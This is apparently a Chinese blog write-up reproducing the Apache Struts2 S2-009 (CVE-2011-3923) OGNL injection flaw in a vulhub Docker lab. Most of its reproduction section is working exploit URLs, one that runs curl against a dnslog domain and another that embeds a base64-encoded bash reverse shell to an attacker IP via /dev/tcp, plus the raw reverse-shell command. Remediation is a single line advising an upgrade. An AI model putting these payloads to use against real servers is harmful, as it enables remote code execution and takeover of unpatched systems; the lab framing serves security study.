CVE-2011-3923 S2-009 远程代码执行漏洞
2023-02-18 16:38:48 时间
1 漏洞信息
漏洞名称 | 远程代码执行漏洞 |
---|---|
漏洞编号 | CVE-2011-3923 |
危害等级 | 高危 |
漏洞类型 | 中间件漏洞 |
漏洞厂商 | Apache |
漏洞组件 | Struts2 |
受影响版本 | 2.0.0 <= Struts2 <= 2.3.1.1 |
漏洞概述 | OGNL还提供广泛的表达评估功能。该漏洞使恶意用户可以绕过内置在ParametersInterceptor中的所有保护(正则表达式模式,拒绝方法调用),从而能够在任何公开的字符串变量中注入恶意表达式以进行进一步评估。 |
2 环境搭建
2.1 环境概述
- Linux操作系统
2.2 搭建过程
拉取镜像
cd vulhub/struts2/s2-009
docker-compose up -d
3 漏洞复现
构造一个恶意的payload并发送。
http://192.168.146.158:8009/ajax/example5?age=12313&name=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D+new+java.lang.Boolean%28false%29,%20%23_memberAccess[%22allowStaticMethodAccess%22]%3d+new+java.lang.Boolean%28true%29,%20@java.lang.Runtime@getRuntime%28%29.exec%28%27curl+5quvn8.dnslog.cn%27%29%29%28meh%29&z[%28name%29%28%27meh%27%29]=true=true
payload原型:
http://192.168.146.158:8009/ajax/example5?age=12313&name=(#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]= new java.lang.Boolean(true), @java.lang.Runtime@getRuntime().exec('curl 5quvn8.dnslog.cn'))(meh)&z[(name)('meh')]=true=true
发现dns有记录,说明存在该漏洞。
既然发现漏洞了,那我们可以开始反弹shell
bash -i >& /dev/tcp/192.168.146.158/9999 0>&1
base加密
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xNTgvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}
访问漏洞url并且添加恶意payload进行抓包。
http://192.168.146.158:8009/ajax/example5?age=12313&name=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D+new+java.lang.Boolean%28false%29,%20%23_memberAccess[%22allowStaticMethodAccess%22]%3d+new+java.lang.Boolean%28true%29,%20@java.lang.Runtime@getRuntime%28%29.exec%28%27bash+-c+%7Becho%2CYmFzaCAtaSA%2BJiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xNTgvOTk5OSAwPiYx%7D%7C%7Bbase64%2C-d%7D%7C%7Bbash%2C-i%7D%27%29%29%28meh%29&z[%28name%29%28%27meh%27%29]=true=true
payload原型:
http://192.168.146.158:8009/ajax/example5?age=12313&name=(#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]= new java.lang.Boolean(true), @java.lang.Runtime@getRuntime().exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xNTgvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}'))(meh)&z[(name)('meh')]=true=true
攻击机进行监听,然后发现成功反弹了shell。
4 修复建议
1、推荐的解决方案:升级至比受漏洞影响的更高版本。
相关文章
- Java 学习笔记 二维数组和对象数组
- Java continue的特殊用法 继续当前循环
- Java 使用Arrays.sort排序 从大到小排列
- JAVA Swing 改变标题栏左上角默认咖啡图标
- 基于 RHEL 的 CentOS 6.4 发布
- Nginx构建负载均衡集群的配置方法
- 在SVN中进行分支开发的最佳实践
- CentOS 7.0正式发布 新特性汇总
- 搭建rsync同步机制 解决测试和生产环境的文件同步问题
- 关于Memcached对key和value的限制
- 升级CentOS的OpenSSH 搭建SFTP Server
- SVN版本库迁移服务器方法
- 解决Cacti监控大内存时数据显示nan的问题
- 为CentOS升级OpenSSL 让Nginx支持TLS 1.2
- 在CentOS 5.x中部署LVS-DR模式
- MiniFramework新增了图片验证码输出和校验功能
- 采用http协议做IM拉取消息的流程设计
- 利用Swoole实现服务器通过WebSocket主动向浏览器推送数据
- 用 MiniFramework 快速构建 REST 风格的 API 接口
- 域名污染后使用ECDN全站加速是否有效?